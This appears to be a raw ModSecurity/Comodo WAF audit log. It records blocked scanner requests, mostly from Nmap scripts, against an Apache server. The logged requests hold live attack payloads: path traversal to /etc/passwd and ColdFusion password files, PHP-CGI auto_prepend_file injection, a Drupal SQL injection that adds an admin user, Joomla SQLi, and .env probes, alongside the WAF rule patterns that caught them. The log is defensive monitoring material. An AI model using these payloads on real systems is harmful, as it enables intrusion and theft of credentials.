"/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749403053138013 869 (- - -) Stopwatch2: 1749403053138013 869; combined=362, p1=321, p2=0, p3=0, p4=0, p5=41, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a2b7b54-Z-- --cde7f072-A-- [09/Jun/2025:00:33:09 +0700] aEXJVce0OZpePEzoRnpYygAAAFc 103.236.140.4 44564 103.236.140.4 8181 --cde7f072-B-- GET /zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../dev/null%00 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --cde7f072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cde7f072-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:skin outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||103.236.140.4|F|3"] [data "ARGS:skin=../../../../../../../../../dev/null\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403989726204 2467 (- - -) Stopwatch2: 1749403989726204 2467; combined=1305, p1=357, p2=920, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cde7f072-Z-- --d3f16640-A-- [09/Jun/2025:00:33:11 +0700] aEXJV6D1_iznf-QmBECaGQAAAI8 103.236.140.4 44586 103.236.140.4 8181 --d3f16640-B-- POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close Content-Length: 52 User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --d3f16640-C-- --d3f16640-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3f16640-E-- --d3f16640-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=1 -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=1 -d auto_prepend_file=php://input: -d allow_url_include=1 -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403991861406 2634 (- - -) Stopwatch2: 1749403991861406 2634; combined=1448, p1=332, p2=1079, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3f16640-Z-- --5aaed809-A-- [09/Jun/2025:00:33:12 +0700] aEXJWKD1_iznf-QmBECaGwAAAJQ 103.236.140.4 44596 103.236.140.4 8181 --5aaed809-B-- GET /zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --5aaed809-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5aaed809-E-- --5aaed809-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403992194566 1710 (- - -) Stopwatch2: 1749403992194566 1710; combined=585, p1=423, p2=137, p3=0, p4=0, p5=25, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5aaed809-Z-- --6fa51871-A-- [09/Jun/2025:00:33:12 +0700] aEXJWKD1_iznf-QmBECaHQAAAJU 103.236.140.4 44604 103.236.140.4 8181 --6fa51871-B-- POST /aczpbuglrjuh HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close Content-Length: 100 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --6fa51871-C-- usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=../../../../../etc/passwd&subform[1][cXIb8O3]=1 --6fa51871-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fa51871-E-- --6fa51871-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /aczpbuglrjuh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403992310153 1656 (- - -) Stopwatch2: 1749403992310153 1656; combined=590, p1=349, p2=210, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fa51871-Z-- --236f5004-A-- [09/Jun/2025:00:33:13 +0700] aEXJWce0OZpePEzoRnpY0wAAAFA 103.236.140.4 44612 103.236.140.4 8181 --236f5004-B-- GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --236f5004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --236f5004-E-- --236f5004-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1749403993610634 1670 (- - -) Stopwatch2: 1749403993610634 1670; combined=559, p1=333, p2=197, p3=0, p4=0, p5=29, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --236f5004-Z-- --eaae3122-A-- [09/Jun/2025:00:33:13 +0700] aEXJWaD1_iznf-QmBECaHwAAAJI 103.236.140.4 44614 103.236.140.4 8181 --eaae3122-B-- POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close Content-Length: 34 User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --eaae3122-C-- --eaae3122-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eaae3122-E-- --eaae3122-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=1 -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=1 -d auto_prepend_file=php://input: -d allow_url_include=1 -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403993980930 2311 (- - -) Stopwatch2: 1749403993980930 2311; combined=1408, p1=351, p2=1030, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eaae3122-Z-- --b6f64f22-A-- [09/Jun/2025:00:33:14 +0700] aEXJWsCyjFxjzV1Pwa07ngAAABA 103.236.140.4 44622 103.236.140.4 8181 --b6f64f22-B-- GET /CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --b6f64f22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6f64f22-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:locale outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||103.236.140.4|F|3"] [data "ARGS:locale=..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5cCFusionMX7\x5clib\x5cpassword.properties\x00en"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403994065550 1654 (- - -) Stopwatch2: 1749403994065550 1654; combined=725, p1=334, p2=364, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6f64f22-Z-- --f79b3c59-A-- [09/Jun/2025:00:33:14 +0700] aEXJWosoVckF-yt1MVzcfgAAANA 103.236.140.4 44620 103.236.140.4 8181 --f79b3c59-B-- POST /?q=/user/login HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close Content-Length: 515 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --f79b3c59-C-- name[0;insert%20into%20users%20%28uid%2Cname%2Cpass%2Cmail%2Cstatus%29%20select%20max%28uid%29%2B1%2C%27inhemffids%27%2C%27%24P%24DxoefzbndQIxTUOXjlVX.JfHThB74s1%27%2C%27egeyuohf%40famfo.sqm%27%2C1%20from%20users%3Binsert%20into%20users_roles%20%28uid%2C%20rid%29%20VALUES%20%28%28select%20uid%20from%20users%20where%20name%3D%27inhemffids%27%29%2C%20%28select%20rid%20from%20role%20where%20name%20%3D%20%27administrator%27%29%29%3B#%20%20]=lalfliecqw&name[0]=dlheczwsnt&pass=heyhkuggbw&form_id=user_login&op=Log+in --f79b3c59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f79b3c59-E-- --f79b3c59-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||103.236.140.4|F|2"] [data "Matched Data: select uid from users found within REQUEST_URI: /?q=/user/login"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403994065538 4559 (- - -) Stopwatch2: 1749403994065538 4559; combined=3421, p1=346, p2=3048, p3=0, p4=0, p5=26, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f79b3c59-Z-- --1f33da23-A-- [09/Jun/2025:00:33:14 +0700] aEXJWse0OZpePEzoRnpY1AAAAFg 103.236.140.4 44626 103.236.140.4 8181 --1f33da23-B-- POST /phpMyAdmin-2.6.4-pl1/libraries/grab_globals.lib.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close Content-Length: 100 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --1f33da23-C-- usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=../../../../../etc/passwd&subform[1][cXIb8O3]=1 --1f33da23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f33da23-E-- --1f33da23-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpMyAdmin-2.6.4-pl1/libraries/grab_globals.lib.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403994908296 1511 (- - -) Stopwatch2: 1749403994908296 1511; combined=573, p1=351, p2=195, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f33da23-Z-- --64e57332-A-- [09/Jun/2025:00:33:15 +0700] aEXJW8CyjFxjzV1Pwa07nwAAABE 103.236.140.4 44630 103.236.140.4 8181 --64e57332-B-- GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1) HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --64e57332-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64e57332-E-- --64e57332-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||103.236.140.4|F|2"] [data "Matched Data: updatexml(1,concat(1,user()),1) found within MATCHED_VAR: updatexml(1,concat(1,user()),1)"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403995509247 3087 (- - -) Stopwatch2: 1749403995509247 3087; combined=1830, p1=401, p2=1403, p3=0, p4=0, p5=26, sr=113, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64e57332-Z-- --117f5e58-A-- [09/Jun/2025:00:33:15 +0700] aEXJW6D1_iznf-QmBECaIAAAAIA 103.236.140.4 44632 103.236.140.4 8181 --117f5e58-B-- HEAD / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close Range: bytes=1-0,0-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10 User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --117f5e58-F-- HTTP/1.1 403 Forbidden Connection: close Content-Type: text/html; charset=iso-8859-1 --117f5e58-H-- Message: Access denied with code 403 (phase 2). Match of "ge %{tx.1}" against "TX:2" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "56"] [id "210330"] [rev "1"] [msg "COMODO WAF: Range: Invalid Last Byte Value||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403995710146 1829 (- - -) Stopwatch2: 1749403995710146 1829; combined=759, p1=366, p2=365, p3=0, p4=0, p5=27, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --117f5e58-Z-- --31c9d068-A-- [09/Jun/2025:00:33:17 +0700] aEXJXcCyjFxjzV1Pwa07oQAAAAM 103.236.140.4 44640 103.236.140.4 8181 --31c9d068-B-- GET /CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --31c9d068-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31c9d068-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:locale outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||103.236.140.4|F|3"] [data "ARGS:locale=..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5cCFusionMX\x5clib\x5cpassword.properties\x00en"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403997333239 2005 (- - -) Stopwatch2: 1749403997333239 2005; combined=771, p1=350, p2=393, p3=0, p4=0, p5=27, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31c9d068-Z-- --550aad63-A-- [09/Jun/2025:00:33:18 +0700] aEXJXsCyjFxjzV1Pwa07pQAAAAY 103.236.140.4 44650 103.236.140.4 8181 --550aad63-B-- GET /CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.155.232.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.155.232.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) --550aad63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --550aad63-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:locale outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||103.236.140.4|F|3"] [data "ARGS:locale=..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5cJRun4\x5cservers\x5ccfusion\x5ccfusion-ear\x5ccfusion-war\x5cWEB-INF\x5ccfusion\x5clib\x5cpassword.properties\x00en"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403998728253 2517 (- - -) Stopwatch2: 1749403998728253 2517; combined=983, p1=461, p2=492, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --550aad63-Z-- --652c8208-A-- [09/Jun/2025:00:45:03 +0700] aEXMH8CyjFxjzV1Pwa07sAAAABI 103.236.140.4 44724 103.236.140.4 8181 --652c8208-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 167.172.158.128 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 167.172.158.128 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --652c8208-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --652c8208-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749404703889606 918 (- - -) Stopwatch2: 1749404703889606 918; combined=345, p1=287, p2=0, p3=0, p4=0, p5=58, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --652c8208-Z-- --08df723e-A-- [09/Jun/2025:00:48:20 +0700] aEXM5MCyjFxjzV1Pwa07tgAAAA4 103.236.140.4 44746 103.236.140.4 8181 --08df723e-B-- GET /www/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1 Accept-Charset: utf-8 --08df723e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08df723e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749404900439242 851 (- - -) Stopwatch2: 1749404900439242 851; combined=337, p1=298, p2=0, p3=0, p4=0, p5=38, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08df723e-Z-- --9d89fb62-A-- [09/Jun/2025:02:51:18 +0700] aEXptse0OZpePEzoRnp0kgAAAFc 103.236.140.4 48486 103.236.140.4 8181 --9d89fb62-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-I545 4G Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Accept: */* --9d89fb62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d89fb62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749412278120943 